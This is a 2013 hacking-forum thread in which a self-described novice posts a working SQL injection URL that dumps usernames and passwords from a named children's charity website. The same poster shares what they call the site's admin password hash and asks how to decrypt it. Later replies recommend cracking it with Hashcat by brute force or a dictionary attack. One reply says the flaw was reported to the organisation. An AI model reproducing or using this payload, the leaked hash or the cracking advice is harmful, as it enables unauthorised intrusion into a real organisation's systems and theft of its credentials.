Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


problem decrypting hash filter_list
Author
Message
problem decrypting hash #1
The goes as follows:
$2aEo89gH4Clc
This would be the admin password for:
Code:
http://www.actforkids.com.au/news_full.php?id=-134%20union%20select%20all%201,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14%20from%20user
(In the url it will show the username:password already.)
(EDIT: the url didn't seem to work, so i put it in the code thingy)
(EDIT EVEN FURTHER: Well, it still doesn't work, don't know why...)
I dont know why it cant be decrypted, any idea

P.S. im new to hacking
[Image: TeusoI9.png]
BACK UNDER YOUR BEDS
TRY TO GET A GOOD NIGHT'S SLEEP NOW

Reply

RE: problem decrypting hash #2
I would love to help but.

PHP Code:
http://www.actforkids.com.au 

It's an organisation that helps kids so I chose a white hat method and contacted them about their security issue.
[Image: qwertyr.png]

Reply

RE: problem decrypting hash #3
(01-31-2013, 02:28 PM)JackDaniels Wrote: I would love to help but.

PHP Code:
http://www.actforkids.com.au 

It's an organisation that helps kids so I chose a white hat method and contacted them about their security issue.

That's still blackhat if you're going to use it for malicious purposes... >_>
[Image: BAvhP6h.png]
Code:
[5:42:25 PM] i0xillusi0n: Breshie don't bust a nut over chloe now
[5:42:31 PM] Entity: fapfapfapfapfapfapfapfapfapfap
[5:42:33 PM] Jigglypuff | SL: EWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Reply

RE: problem decrypting hash #4
(01-31-2013, 02:28 PM)JackDaniels Wrote: I would love to help but.

PHP Code:
http://www.actforkids.com.au 

It's an organisation that helps kids so I chose a white hat method and contacted them about their security issue.

Yea, wasn't planning on using it for anything, just trying out SQL injection for the first time.
anyway, how do you decrypt a password, just as a general question?
[Image: TeusoI9.png]
BACK UNDER YOUR BEDS
TRY TO GET A GOOD NIGHT'S SLEEP NOW

Reply

RE: problem decrypting hash #5
Hash password as I know (at least most of them) are one-way algorithms. That means you can't decrypt it. You will have to crack it, or use a dictionary. Your best bet would be Hashcat (can be found on google, use it to brute-force the password or use a dictionary attack)

Reply

RE: problem decrypting hash #6
(01-31-2013, 03:01 PM)cr33pyguy Wrote:
(01-31-2013, 02:28 PM)JackDaniels Wrote: I would love to help but.

PHP Code:
http://www.actforkids.com.au 

It's an organisation that helps kids so I chose a white hat method and contacted them about their security issue.

Yea, wasn't planning on using it for anything, just trying out SQL injection for the first time.
anyway, how do you decrypt a password, just as a general question?

Hashes are one-way methods, so you'd need to bruteforce or dictionary attack it. However, this is a hash I have never seen before, if it even is a hash to begin with, not sure.
[Image: BAvhP6h.png]
Code:
[5:42:25 PM] i0xillusi0n: Breshie don't bust a nut over chloe now
[5:42:31 PM] Entity: fapfapfapfapfapfapfapfapfapfap
[5:42:33 PM] Jigglypuff | SL: EWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW

Reply







Users browsing this thread: 1 Guest(s)